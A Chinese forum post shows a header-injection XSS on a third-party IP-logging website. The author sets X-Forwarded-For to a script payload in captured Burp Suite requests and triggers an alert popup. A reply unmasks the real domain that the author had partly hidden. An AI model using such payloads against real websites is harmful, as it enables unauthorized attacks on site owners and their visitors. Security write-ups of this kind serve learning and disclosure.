用户
搜索
  • TA的每日心情
    开心
    2019-1-5 10:44
  • 签到天数: 2 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    5

    主题

    6

    帖子

    151

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2018-4-2

    i春秋签约作者

    发表于 2019-8-28 18:27:13 12611
    本帖最后由 半岛玫瑰 于 2019-8-28 18:28 编辑

    首先是一个这个网站:

    https://io.xxx.cn/iper/ips.html

    1.png

    只要你访问了这个URL:
    https://io.xxx.cn/iper/

    2.png

    然后就会记录你的IP:

    3.png

    那么如果吧IP修改为XssPayload会不会触发XSS跨站脚本攻击呢?

    先是下载了这个修改IP的插件:X-Forwarded-For Header

    需要科学上网才能使用哦!

    4.png

    我显示吧IP修改为内网IP然后通过BurpSuite抓包:

    5.png

    GET /iper/ HTTP/1.1
    Host: io.xxx.cn
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    X-Forwarded-For: 192.168.1.2
    Accept-Language: zh-CN,zh;q=0.9

    吧X-Forwarded-For: 192.168.1.2修改为:X-Forwarded-For: "/><script>alert('Power_liu')</script>script>:

    6.png

    GET /iper/ HTTP/1.1
    Host: io.xxx.cn
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    X-Forwarded-For: "/><script>alert('Power_liu')</script>script>
    Accept-Language: zh-CN,zh;q=0.9

    279a.png

    这样就成功触发了XSS-Payload弹窗!还是挺有趣的!

    qq:211124332


    欢迎各位大佬找我唠嗑!

    发表于 2019-8-30 08:56:47
    https://io.lookcos.cn/iper/ips.html  打码是一门艺术
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册